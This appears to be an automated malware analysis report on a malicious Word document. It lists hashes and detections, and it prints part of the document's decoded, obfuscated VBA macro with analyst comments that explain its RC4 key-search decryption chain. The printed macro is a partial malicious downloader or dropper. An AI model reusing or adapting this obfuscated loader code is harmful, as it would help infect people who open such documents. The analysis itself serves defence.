Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d8a2384a51cd59f6…

MALICIOUS

Office (OLE)

96.0 KB Created: 2018-09-24 11:06:00 Authoring application: Microsoft Office Word First seen: 2019-01-11
MD5: 1ca60c0dd514d53946d2b777793daa1a SHA-1: ef1fe8485ba0396af74fb7c9f9b20e696fd63b73 SHA-256: d8a2384a51cd59f6390e6a4fcb04b51358cdbd5e04cae5be23daae548c306a73
162 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros, as indicated by the OLE_VBA_MACROS heuristic and the presence of the 'macros.bas' file. The VBA code utilizes GetObject and CallByName functions, suggesting an attempt to execute arbitrary code. While the script is truncated, its structure and the presence of obfuscated byte arrays point towards a downloader or dropper functionality, likely aiming to fetch and execute a second-stage payload.

Heuristics 5

  • ClamAV: Doc.Malware.Valyria-9761059-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-9761059-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 28864 bytes
SHA-256: cd5271719c2e5715c2548c4238181e8e4500efe48de77cf91f98fb00c044df31
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "sub1, 0, 0, MSForms, Frame"
Dim dim9, dim98(2) As Byte, dim87(9) As Byte, dim76(32) As Byte, dim75(19) As Byte, dim55(13) As Byte, dim6(5) As Byte, dim70(55) As Byte, dim02(805) As Byte, dim53(5) As Byte, dim64(22) As Byte, dim29(22) As Byte, dim44(1 To 255) As Byte
' Driver of the decoding chain (its caller is outside this preview).
' Builds the identity table dim44, then iterates an integer counter dim92: each
' iteration turns the counter's decimal string into key material (dim6), runs the
' keystream transform dim00 over the 23-byte constant dim64 and compares the result
' with dim29 via dim45.  Only when that known-plaintext check succeeds is the next
' stage dim19 called.  In other words the macro does not store its decryption key;
' it searches for it at runtime, which also burns time in sandboxes that cap macro
' execution - analysts should expect a long-running or timed-out dynamic trace.
Private Function dim61()
Dim dim92, dim57, dim73, dim46() As Byte, dim08, dim89
dim89 = 1
' 2236860 / 8772 = 255, so this sets dim44(i) = i for i = 1..255.
While dim89 <= (2236860 / 8772)
dim44(dim89) = dim89
dim89 = dim89 + 1
Wend
dim05                      ' not in this preview
dim93                      ' fills the ciphertext buffer dim64 (below)
dim08 = (281088 / 1098)    ' = 256, used as the byte-pair multiplier below
dim21                      ' not in this preview; presumably fills dim29 - TODO confirm
' dim57 starts as Empty, which compares equal to 0, so the loop runs until the
' sentinel 2329 is stored below.
While dim57 = 0
' Assigning a String to a Byte array stores its two-bytes-per-character form, so
' dim46 holds the counter's decimal digits each followed by a zero byte.
' (On the first pass dim92 is Empty and CStr(Empty) is "", giving an empty array.)
dim46 = CStr(dim92)
dim73 = dim81(dim46())     ' presumably the upper bound / length of dim46 - not visible
' Pack consecutive byte pairs as little-endian 16-bit values into dim6(2)..dim6(6).
' dim6(0) and dim6(1) are never written here; if they are used they must be set
' by dim05 or dim21.  dim6 is declared with upper bound 5, so the dim6(6) store
' for a five-digit counter would raise "Subscript out of range" (no handler in
' this function) unless dim6 is resized elsewhere - TODO confirm.
If dim73 >= 1 Then
dim6(2) = dim46(0) + (dim46(1) * dim08)
If dim73 >= 3 Then
dim6(3) = dim46(2) + (dim46(3) * dim08)
If dim73 >= 5 Then
dim6(4) = dim46(4) + (dim46(5) * dim08)
If dim73 >= 7 Then
dim6(5) = dim46(6) + (dim46(7) * dim08)
If dim73 >= 9 Then
dim6(6) = dim46(8) + (dim46(9) * dim08)
End If
End If
End If
End If
End If
' dim15 (not visible) presumably expands dim6 into the 256-entry state dim00
' expects; dim00 transforms dim64(0..22) with it; dim45 returns 1 only when all
' 23 output bytes equal dim29 - a known-plaintext test of the candidate key.
If dim45(dim00(dim64(), dim15(dim6()), 22), dim29, 22) = 1 Then
dim57 = 2329               ' sentinel: key found, leave the loop
End If
dim92 = dim92 + 1
Wend
If dim57 = 2329 Then
dim19                      ' next stage: decrypts dim70 / dim02 with the same state (see dim19)
Else
' Only reachable if dim57 were changed to some other non-zero value elsewhere;
' within this function the loop exits solely via the sentinel above.
MsgBox dim57
End If
End Function
' Fills the 23-byte buffer dim64(0..22) with fixed values.  Because dim44(n) = n
' (identity table built in dim61), each line is just an obfuscated literal byte
' store; the shuffled index order has no effect on the result.  dim64 is the
' ciphertext that dim61's key search decrypts and compares against dim29.
Private Sub dim93()
dim64(20) = dim44(214)
dim64(18) = dim44(204)
dim64(19) = dim44(165)
dim64(5) = dim44(31)
dim64(9) = dim44(201)
dim64(10) = dim44(5)
dim64(14) = dim44(149)
dim64(22) = dim44(204)
dim64(4) = dim44(2)
dim64(15) = dim44(150)
dim64(0) = dim44(209)
dim64(3) = dim44(214)
dim64(11) = dim44(74)
dim64(1) = dim44(143)
dim64(21) = dim44(17)
dim64(8) = dim44(217)
dim64(2) = dim44(52)
dim64(6) = dim44(245)
dim64(16) = dim44(230)
dim64(17) = dim44(124)
dim64(12) = dim44(166)
dim64(7) = dim44(144)
dim64(13) = dim44(173)
End Sub
' Splits the numeric argument dim90 into a two-element Byte array:
'   element 0 = low byte  (dim36(dim90, 256); dim36 is not visible, presumably Mod)
'   element 1 = high byte (dim90 / 256), or Empty -> 0 when dim90 <= 255.
' All the arithmetic constants below evaluate to 255 or 256.
' Note: "/" is floating-point division in VBA and storing a Double into a Byte
' rounds rather than truncates, so the high byte can come out one too large when
' the low byte is >= 128 - whether that matters depends on the caller, and no
' caller appears in this preview.
Private Function dim20(dim90)
Dim dim77(1) As Byte, dim50, dim68, dim78
If dim90 > (1116135 / 4377) Then
dim50 = dim36(dim90, (-4310 + 4566))
dim78 = dim90 / (5335 - 5079)
dim68 = dim78
Else
dim50 = dim90
End If
dim77(0) = dim50
dim77(1) = dim68
dim20 = dim77
End Function
' Keystream transform: returns a transformed copy of dim07(0..dim7) using the
' 256-entry state array dim22 (dim7 is the last index, so the loop is inclusive).
' Reading dim36(a, b) as "a Mod b" and dim51(a, b) as XOR (neither helper is in
' this preview), the second loop is exactly the RC4 output (PRGA) step:
'   i = (i + 1) mod 256, j = (j + S[i]) mod 256, swap S[i] and S[j],
'   out = in XOR S[(S[i] + S[j]) mod 256]
' The key-scheduling step is not here; dim15 (called by dim61 and dim19) presumably
' derives the state from dim6.  Every constant expression below evaluates to 255 or
' 256.  "On Error Resume Next" hides subscript errors, so a short or mismatched
' state array silently leaves entries of dim2 Empty instead of failing.
Private Function dim00(dim07() As Byte, dim22() As Byte, dim7)
On Error Resume Next
' dim2 is a Variant array working copy of the state so the caller's dim22 is
' left intact; dim97 is likewise a copy of the input (array assignment copies).
Dim dim2(0 To 255), dim31, dim0, dim11, dim97() As Byte, dim59
While dim31 <= (660195 / 2589)
dim2(dim31) = dim22(dim31)
dim31 = dim31 + 1
Wend
dim31 = 0
dim97 = dim07()
While dim31 <= dim7
dim0 = dim36((dim0 + 1), (-3071 + 3327))
dim11 = dim36((dim11 + dim2(dim0)), (-1952 + 2208))
dim59 = dim2(dim0)
dim2(dim0) = dim2(dim11)
dim2(dim11) = dim59
dim97(dim31) = dim51(dim97(dim31), (dim2(dim36((dim2(dim0) + dim2(dim11)), (1377024 / 5379)))))
dim31 = dim31 + 1
Wend
dim00 = dim97
End Function
' Byte-array equality check: returns 1 when dim60(i) = dim24(i) for every i in
' 0..dim01 (inclusive), otherwise 0.  It does not stop at the first mismatch.
' Any runtime error - e.g. an index past either array's bound - jumps to dim42
' and also yields 0, so a candidate key that produces a wrongly sized result is
' simply treated as "no match" by dim61's search loop.
Private Function dim45(dim60() As Byte, dim24() As Byte, dim01)
Dim dim94, dim26
On Error GoTo dim42
dim26 = 1
dim94 = 0
While dim94 <= dim01
If dim60(dim94) <> dim24(dim94) Then
dim26 = 0
End If
dim94 = dim94 + 1
Wend
dim45 = dim26
Exit Function
dim42:
dim45 = 0
End Function
' Fills the 3-byte buffer dim98(0..2) with fixed values (dim44(n) = n, so these
' are plain literals routed through the identity table).  Called from dim19 after
' the key search succeeds; how dim98 is consumed is outside this preview.
Private Sub dim30()
dim98(1) = dim44(217)
dim98(2) = dim44(2)
dim98(0) = dim44(212)
End Sub
' Fills the 10-byte buffer dim87(0..9) with fixed values via the identity table
' dim44 (dim44(n) = n).  Called from dim19; the consumer of dim87 is not in this
' preview - presumably another ciphertext or parameter blob for the next stage.
Private Sub dim18()
dim87(9) = dim44(137)
dim87(5) = dim44(51)
dim87(1) = dim44(212)
dim87(4) = dim44(22)
dim87(8) = dim44(128)
dim87(7) = dim44(176)
dim87(6) = dim44(223)
dim87(2) = dim44(25)
dim87(3) = dim44(231)
dim87(0) = dim44(192)
End Sub
' Fills the 14-byte buffer dim55(0..13) with fixed values via the identity table
' dim44 (dim44(n) = n).  Called from dim19 right after dim18; its consumer is not
' in this preview.  Note dim55(0) and dim55(6) receive the same bytes as dim87(0)
' and dim87(6) - possibly a shared prefix, but that is speculation from two bytes.
Private Sub dim04()
dim55(4) = dim44(47)
dim55(12) = dim44(250)
dim55(3) = dim44(231)
dim55(10) = dim44(89)
dim55(2) = dim44(23)
dim55(13) = dim44(180)
dim55(7) = dim44(167)
dim55(8) = dim44(155)
dim55(9) = dim44(159)
dim55(1) = dim44(204)
dim55(5) = dim44(19)
dim55(11) = dim44(17)
dim55(0) = dim44(192)
dim55(6) = dim44(223)
End Sub
Private Sub dim19()
Dim dim2() As Byte
dim2 = dim15(dim6())
dim85
Dim dim28
Set dim28 = dim62(dim95(dim00(dim70(), dim2(), 56), 56))
dim30
dim32
dim83
Dim dim66
dim66 = dim95(dim00(dim02(), dim2(), 806), 806)
dim14
dim18
dim04
dim91
Dim dim52, dim38
... (truncated)